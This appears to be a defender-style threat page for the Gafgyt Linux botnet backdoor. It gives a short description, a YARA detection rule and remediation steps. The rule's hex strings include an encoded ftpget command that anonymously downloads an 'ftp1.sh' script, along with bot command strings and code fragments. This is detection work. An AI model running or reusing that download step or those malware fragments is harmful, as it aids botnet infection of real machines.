Backdoor:Linux/Gafgyt.W!MTB - Windows Defender Threat Analysis

This threat is a backdoor from the Gafgyt malware family, designed to infect Linux systems and add them to a botnet. The compromised machine can then be used by an attacker to launch Distributed Denial-of-Service (DDoS) attacks. The malware typically spreads by scanning for other devices with weak or default credentials.

No specific strings found for this threat

rule Backdoor_Linux_Gafgyt_W_2147797445_0
{
    meta:
        author = "threatcheck.sh"
        detection_name = "Backdoor:Linux/Gafgyt.W!xp"
        threat_id = "2147797445"
        type = "Backdoor"
        platform = "Linux: Linux platform"
        family = "Gafgyt"
        severity = "Critical"
        info = "xp: an internal category used to refer to some threats"
        signature_type = "SIGNATURE_TYPE_ELFHSTR_EXT"
        threshold = "2"
        strings_accuracy = "Low"
    strings:
        $x_1_1 = "SCANNER STOPPED" ascii //weight: 1
        $x_1_2 = "KILLATTK" ascii //weight: 1
        $x_1_3 = {66 74 70 67 65 74 20 2d 76 20 2d 75 20 61 6e 6f 6e 79 6d 6f 75 73 20 2d 70 20 61 6e 6f 6e 79 6d 6f 75 73 20 2d 50 20 32 31 20 [0-21] 20 66 74 70 31 2e 73 68 20 66 74 70 31 2e 73 68}  //weight: 1, accuracy: Low
        $x_1_4 = {8b 4d fc 8b 45 fc 83 e8 03 8b 14 85 ?? ?? ?? ?? 8b 45 fc 83 e8 02 8b 04 85 ?? ?? ?? ?? 31 c2 8b 45 fc 31 d0 35 b9 79 37 9e 89 04 8d 80 43 05 08 ff 45 fc}  //weight: 1, accuracy: Low
        $x_1_5 = {55 89 e5 83 ec 10 8b 45 08 a3 80 43 05 08 8b 45 08 2d 47 86 c8 61 a3 84 43 05 08 8b 45 08 05 72 f3 6e 3c a3 88 43 05 08 c7 45 fc 03 00 00 00 eb 33}  //weight: 1, accuracy: High
    condition:
        (filesize < 20MB) and
        (2 of ($x*))
}

Isolate the affected Linux system from the network to prevent lateral movement and C2 communication. Use the security product to remove the detected file and any associated persistence. Immediately change all passwords, apply system patches, and harden the system by disabling unnecessary services.